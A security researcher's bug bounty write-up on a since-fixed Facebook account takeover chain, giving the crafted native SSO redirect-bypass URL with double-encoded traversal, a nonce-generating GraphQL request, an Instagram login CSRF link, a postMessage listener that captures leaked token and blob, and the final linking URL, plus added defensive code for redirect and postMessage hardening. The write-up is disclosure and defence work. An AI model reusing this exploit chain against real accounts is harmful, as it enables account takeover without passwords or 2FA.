Two-click Facebook account takeover via FXAuth token and blob theft
Introduction
Facebook and Instagram accounts are deeply integrated through Accounts Center, allowing users to link identities, share authentication methods, and manage security settings across platforms.
This integration relies on native SSO flows, FXAuth tokens, and redirect-based handoffs between Facebook and Instagram accountscenter domains. When these components are not strictly isolated, a single leaked token can be replayed across platforms and escalate into full account compromise.
This report describes a complete attack chain that allows an attacker to link a victim’s Facebook account to the attacker’s Instagram account and gain persistent access.
High-Level Impact
After successful exploitation, the attacker can:
- Link the victim’s Facebook account to the attacker’s Instagram account
- Control Facebook account settings through Accounts Center
- Potentially authenticate into Facebook using Instagram login (mobile)
- Maintain long-term access without Facebook credentials or 2FA
Description
Accounts Center Native SSO Endpoint
The vulnerability originates from the endpoint https://www.facebook.com/login/native_sso/. This endpoint is used for cross-app authentication and accepts several parameters, including:
- app_id
- token (FXAuth token to be signed)
- extra_data (redirect path)
The extra_data parameter is validated based on the calling application.
For the Instagram application (app_id = 1217981644879628), Facebook historically allowed any redirect path starting with /accounts_center/. This behavior existed before accountscenter.instagram.com was introduced.
By combining double URL-encoded characters with path traversal, it is possible to escape the intended /accounts_center/ prefix and redirect to any other endpoint while still passing the prefix check.
The following crafted URL demonstrates the bypass:
https://www.facebook.com/login/native_sso/?
&flow=fbcal
&app_id=1217981644879628
&token=FXAUTH_TOKEN
&custom_content_config=accounts_center
&extra_data=/accounts_center/%252%0DE%252%0DE\%252%0DE%252%0DE\/%252%0DE%252%0DE\%252%0DE%252%0DE\any_endpoint
After user confirmation, the flow redirects to https://www.instagram.com/any_endpoint
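The prefix check described above is tested on the raw, still-encoded parameter, which is why encoded traversal gets through. The following added example (my illustration, not Meta's code) contrasts that bare prefix check with a canonicalise-then-check validator: it fully percent-decodes the path, rejects control characters and malformed escapes, unifies backslashes with slashes, resolves "." and ".." segments, and only then tests the prefix. The allowed prefix mirrors the report's /accounts_center/ rule; the function names, the decode-round limit and the accept/reject policy are assumptions. The test vectors are the report's own bypass payload, a plain double-encoded traversal, and a legitimate path.

```javascript
// Added example, not Meta's code: why a bare prefix check on a redirect
// path is insufficient, and a canonicalise-then-check alternative.
// ALLOWED_PREFIX mirrors the report's "/accounts_center/" rule; the
// function names and the accept/reject policy are assumptions.

const ALLOWED_PREFIX = "/accounts_center/";
const MAX_DECODE_ROUNDS = 3; // assumption: bound repeated decoding

// The weak check the report describes: "any redirect path starting with
// /accounts_center/", tested on the raw, still-encoded parameter.
function naiveIsAllowed(path) {
  return path.startsWith(ALLOWED_PREFIX);
}

// Percent-decode until the string stops changing, rejecting input that is
// malformed, still carries a '%' after decoding, or contains control
// characters (a CR inside an escape sequence is the trick in the report).
function fullyDecode(path) {
  let cur = path;
  for (let i = 0; i < MAX_DECODE_ROUNDS; i++) {
    if (/[\x00-\x1f\x7f]/.test(cur)) return null;
    let next;
    try {
      next = decodeURIComponent(cur);
    } catch (_e) {
      return null; // malformed escape sequence
    }
    if (next === cur) break;
    cur = next;
  }
  if (cur.includes("%") || /[\x00-\x1f\x7f]/.test(cur)) return null;
  return cur;
}

// Normalise separators and resolve "." / ".." segments so the prefix test
// runs on the path the browser will actually request.
function canonicalisePath(path) {
  const decoded = fullyDecode(path);
  if (decoded === null) return null;
  const unified = decoded.replace(/\\/g, "/");
  const out = [];
  for (const seg of unified.split("/")) {
    if (seg === "" || seg === ".") continue;
    if (seg === "..") {
      if (out.length === 0) return null; // traversal above the root
      out.pop();
      continue;
    }
    out.push(seg);
  }
  const trailing = unified.endsWith("/") ? "/" : "";
  return "/" + out.join("/") + trailing;
}

// Hardened check: canonicalise first, then require the prefix, and hand back
// the canonical path so the caller redirects to exactly what was validated.
function hardenedRedirectPath(path) {
  const canon = canonicalisePath(path);
  if (canon === null || !canon.startsWith(ALLOWED_PREFIX)) return null;
  return canon;
}

// Constructed test vectors: the report's own bypass payload, a plain
// double-encoded traversal, and a legitimate Accounts Center path.
const REPORT_PAYLOAD =
  "/accounts_center/%252%0DE%252%0DE\\%252%0DE%252%0DE\\/%252%0DE%252%0DE\\%252%0DE%252%0DE\\any_endpoint";
const DOUBLE_ENCODED = "/accounts_center/%252e%252e/any_endpoint";
const LEGITIMATE = "/accounts_center/profiles/";

// Returns, per vector, what the naive check and the hardened check decide.
function demo() {
  return [REPORT_PAYLOAD, DOUBLE_ENCODED, LEGITIMATE].map((p) => ({
    path: p,
    naive: naiveIsAllowed(p),
    hardened: hardenedRedirectPath(p),
  }));
}

console.table(demo());
```

Both crafted vectors pass the naive check and are rejected by the hardened one: the report's payload because a CR appears after the first decoding round, the double-encoded one because it canonicalises to /any_endpoint. Returning the canonical path rather than a boolean matters too; redirecting to the raw parameter after validating a different string reopens the gap.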
Redirect endpoint: /billing_interfaces/external_result
The native SSO flow could now redirect to any endpoint on www.instagram.com. I found this particular endpoint:
https://www.instagram.com/billing_interfaces/external_result/?
&token=TOKEN
&blob=BLOB
This endpoint tries to communicate with its opener and parent windows using postMessage with the target origin set to *. Normally, only limited data is sent. However, when a valid nonce parameter is added to the endpoint, it sends the entire URL, leaking sensitive parameters including:
- token
- blob
This behavior enables token exfiltration. The nonce, however, cannot be guessed and must be generated legitimately for a specific Instagram user. This means we need to generate a nonce for the attacker's Instagram account and then force that Instagram account to be logged in inside the victim's browser.
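The two defects in the result page are a wildcard target origin and a payload that carries the full URL, secrets included. The following added example (my illustration, not Instagram's code) shows the shape a hardened result page and its receiver would take: secret-bearing query parameters are stripped before the URL leaves the page, postMessage is addressed to a single expected origin rather than *, and the receiver ignores any message whose origin is not the one it expects. The message shape, the parameter list and the fake-window stand-in are assumptions so the code runs outside a browser; the sample URL is constructed.

```javascript
// Added example, not Instagram's code: reporting a result to an opener
// window without leaking URL secrets. Names, the message shape and the
// allowed-origin policy are assumptions for illustration.

// Query parameters that must never be forwarded to another window.
const SENSITIVE_PARAMS = ["token", "blob"];

// Drop secret-bearing query parameters before the URL leaves this page.
function redactUrl(urlString) {
  const u = new URL(urlString);
  for (const name of SENSITIVE_PARAMS) u.searchParams.delete(name);
  return u.toString();
}

// Sender side: address one expected origin, never "*", and send only the
// redacted URL. Returns false when there is no window to talk to.
function postResult(targetWindow, resultUrl, expectedOrigin) {
  if (!targetWindow) return false;
  const msg = { type: "billing_result", redirect_url: redactUrl(resultUrl) };
  targetWindow.postMessage(msg, expectedOrigin);
  return true;
}

// Receiver side: accept only messages from the expected origin with the
// expected shape; anything else is dropped.
function acceptMessage(event, expectedOrigin) {
  if (event.origin !== expectedOrigin) return null;
  if (!event.data || event.data.type !== "billing_result") return null;
  return event.data.redirect_url;
}

// Constructed stand-in for window.opener so this runs outside a browser;
// it records what would have been posted and to which target origin.
function makeFakeWindow() {
  const calls = [];
  return {
    calls,
    postMessage(data, targetOrigin) {
      calls.push({ data, targetOrigin });
    },
  };
}

// Constructed sample result URL with placeholder secret values.
const SAMPLE_RESULT_URL =
  "https://www.instagram.com/billing_interfaces/external_result/?token=T0KEN&blob=BL0B&status=ok";
const EXPECTED_ORIGIN = "https://www.instagram.com";

// Walks the hardened exchange end to end and returns what each side saw.
function runExchange() {
  const opener = makeFakeWindow();
  postResult(opener, SAMPLE_RESULT_URL, EXPECTED_ORIGIN);
  const posted = opener.calls[0];
  return {
    targetOrigin: posted.targetOrigin,
    forwardedUrl: posted.data.redirect_url,
    fromExpectedOrigin: acceptMessage({ origin: EXPECTED_ORIGIN, data: posted.data }, EXPECTED_ORIGIN),
    fromOtherOrigin: acceptMessage({ origin: "https://other.example", data: posted.data }, EXPECTED_ORIGIN),
  };
}

console.log(runExchange());
```

In a real page the opener would be window.opener and the expected origin would come from configuration, not from the URL. Note that redaction and origin pinning are independent defences: pinning alone still hands the full URL to an unexpected opener if the origin list is ever loosened, and redaction alone still lets an unrelated site learn that the flow completed.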
Attack Flow Summary
Preparation
I - Generating a valid nonce for the endpoint
Using an attacker-controlled Instagram account:
1) Visit https://www.instagram.com/ad_tools/
2) Click “Add funds” or “Payment Settings”
3) Capture a request containing an access_token, to either:
- facebook.com/auth/token
- graph.facebook.com
4) Use the access token to call the following GraphQL mutation:
https://graph.facebook.com/graphql/?
&locale=en_US
&access_token=ACCESS_TOKEN
&variables={
"input": {
"country": "US",
"establish_type": "INIT",
"logging_data": {
"logging_counter": 41,
"logging_id": "3790958217"
},
"payment_account_id": "PAYMENT_ACCOUNT_ID",
"upl_logging_data": {},
"actor_id": "1",
"client_mutation_id": "16"
}
}
&server_timestamps=true
&doc_id=8354858754606667
&method=post
Where PAYMENT_ACCOUNT_ID is obtained from the url:
https://business.facebook.com/billing_hub/payment_settings/?asset_id=PAYMENT_ACCOUNT_ID
The response contains a valid nonce value, for example: hwFlRFhb3krN0rprx16bYLQ2FQ9bpJei
II - Instagram Login CSRF
This can be achieved using Instagram’s email-based login flow. When a user initiates a password reset on Instagram, they receive an email titled:
We’ve made it easy to get back on Instagram
The email contains a “Login as USERNAME” link pointing to:
https://www.instagram.com/_n/web_emaillogin?
&uid=ENCODED_UID
&token=LOGIN_NONCE
&auto_send=0
Visiting this URL automatically authenticates you in the browser and sets Instagram session cookies without requiring any further interaction. This endpoint acts as a login CSRF primitive.
III - Generating an FXAuth Token to be signed
The FXAuth token used in this attack must first be generated by the attacker and sent to the victim in the exploit. The token and blob that come back are bound to that initial token, and the attacker uses them to finalize the linking process with the attacker's account:
As the attacker:
1) Visit https://accountscenter.instagram.com/profiles/
2) Click “Add account”
3) You get redirected to:
https://www.facebook.com/login/native_sso/?
&flow=fbcalcomettest
&app_id=1217981644879628
&token=FXAUTH_TOKEN
&extra_data=%2Fadd%2F%3Fbackground_page%3D%252Fprofiles%252F&custom_content_config=accounts_center
4) Extract the token parameter value and close the page without further interaction.
Attack
0) The victim visits the attacker's website
1) The attacker forces the victim's browser to log in to the attacker's Instagram account by loading the Instagram login CSRF URL:
https://www.instagram.com/_n/web_emaillogin?
&uid=ENC_UID
&token=LOGIN_NONCE
&auto_send=0
2) After detecting the login, the attacker’s script opens a new window with the crafted Native SSO URL:
https://www.facebook.com/login/native_sso/?
&flow=fbcal
&app_id=1217981644879628
&token=FXAUTH_TOKEN
&custom_content_config=accounts_center
&extra_data=/accounts_center/%252%0DE%252%0DE\%252%0DE%252%0DE\/%252%0DE%252%0DE\%252%0DE%252%0DE\billing_interfaces\external_result?nonce=ATTACKER_NONCE
3) Victim confirms usage of Instagram app
4) The endpoint redirects back to https://business.facebook.com/billing_interfaces/external_result/?blob=VICTIM_BLOB&token=VICTIM_TOKEN&nonce=ATTACKER_NONCE.
5) The endpoint sends a message via postMessage to the opener window containing the full redirect URL
6) The attacker captures the message and extracts blob and token using a listener like this example:
    <html>
    <body>
    <script>
      // log_data is the report's placeholder for the receiving side's logging function; it is not defined here
      onmessage = (e) => {
        log_data(e.data.direct_debit_redirect_url);
      };
    </script>
    </body>
    </html>
7) Using the stolen victim’s blob and token, the attacker later navigates to:
https://accountscenter.instagram.com/add/?
&background_page=%2Fprofiles%2F
&blob=BLOB
&token=TOKEN
&auth_flow=linking
The victim’s Facebook account gets linked to the attacker’s Instagram account. At this point, the attacker gains control through Accounts Center and can manage settings or authenticate via Instagram.
Impact
This vulnerability enables cross-platform account takeover by chaining:
- FXAuth token reuse
- Weak redirect validation in native SSO
- Token leakage via postMessage
- Email-based Instagram login CSRF
The result is persistent Facebook account compromise without passwords or 2FA.
Timeline
Oct 16, 2024 — Bug reported
Oct 30, 2024 — Bug Acknowledged by Facebook
Nov 5, 2024 — Bug Fixed by Facebook
Nov 27, 2024 — $30,000 bounty awarded by Meta